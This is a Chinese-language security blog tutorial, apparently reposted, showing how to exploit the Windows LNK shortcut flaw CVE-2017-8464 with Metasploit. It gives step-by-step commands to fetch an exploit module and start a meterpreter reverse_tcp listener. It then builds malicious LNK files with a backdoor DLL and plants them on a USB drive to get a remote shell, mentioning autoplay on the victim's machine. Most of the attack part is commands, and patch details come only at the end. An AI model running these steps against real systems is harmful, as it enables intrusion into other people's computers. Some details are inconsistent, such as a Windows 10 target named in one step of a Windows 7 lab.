Msf下的LNK漏洞(CVE-2017-8464)利用

来源于先知社区 - https://xz.aliyun.com/t/103

0x01 前言

RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小。

攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制,文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件,打开此驱动器 (或远程共享) 时,恶意文件就会在目标系统上执行攻击者的代码。

0x02 漏洞环境搭建与利用

漏洞环境搭建:

kalix86 192.168.1.109 攻击机

windows7x64 192.168.1.101 目标靶机

漏洞利用:

1.kali主机下载cve_2017_8464_lnk_rce.rb:

cd /opt

wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

Msf下的LNK漏洞(CVE-2017-8464)利用

2.将cve_2017_8464_lnk_rce.rb拷贝到

/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下:

cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

Msf下的LNK漏洞(CVE-2017-8464)利用

3.生成监听shell:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.109

msf exploit(handler) > exploit -j

Msf下的LNK漏洞(CVE-2017-8464)利用

4生成大量的.LNK文件(对应盘符从D盘到Z盘)和要加载的.dll文件(后门文件, copy了一个lnk文件(根据插入靶机U盘后识别的盘符,例如我插入U盘后显示的E盘,所以就选择了E结尾的lnk文件)和dll文件到U盘)

msf exploit(handler) > back

msf > use exploit/windows/smb/cve_2017_8464_lnk_rce

msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109

msf exploit(cve_2017_8464_lnk_rce) > exploit

Msf下的LNK漏洞(CVE-2017-8464)利用

5.将/root/.msf4/local/*所有文件拷贝到/opt目录下的test文件夹中,然后拷贝到目标靶机windows10X64上

root@backlion:~# cd /opt

root@backlion:/opt# mkdir test

root@backlion:/opt# cp /root/.msf4/local/* test/

root@backlion:/opt# cd test/

root@backlion:/opt/test# ls

Msf下的LNK漏洞(CVE-2017-8464)利用

拷贝的本机win7x64上:

Msf下的LNK漏洞(CVE-2017-8464)利用

6.然后点击快捷键,就会触发注册dll文件,如果不行直接注册dll文件(一般是将这项快捷键和DLL文件拷贝到一个文件夹里面然后拷贝到U盘,只要对方开了U盘自动启动播放功能,就会自动触发注册dll文件)

Msf下的LNK漏洞(CVE-2017-8464)利用

7.在kali下可以看到成功获得sesions会话为1

sessions -i 1

Msf下的LNK漏洞(CVE-2017-8464)利用

8.然后进入到会话,就会成功进入到metermter的shell界面:

Msf下的LNK漏洞(CVE-2017-8464)利用

0x03漏洞影响与修复

漏洞影响:

Windows 10

Windows 7

Windows 8.1

Windows RT 8.1

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

漏洞修复:

下载补丁,其地址为:

https://support.microsoft.com/zh-cn/help/4025686/microsoft-security-advisory-4025685-guidance-for-supported-platforms

免责声明: H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索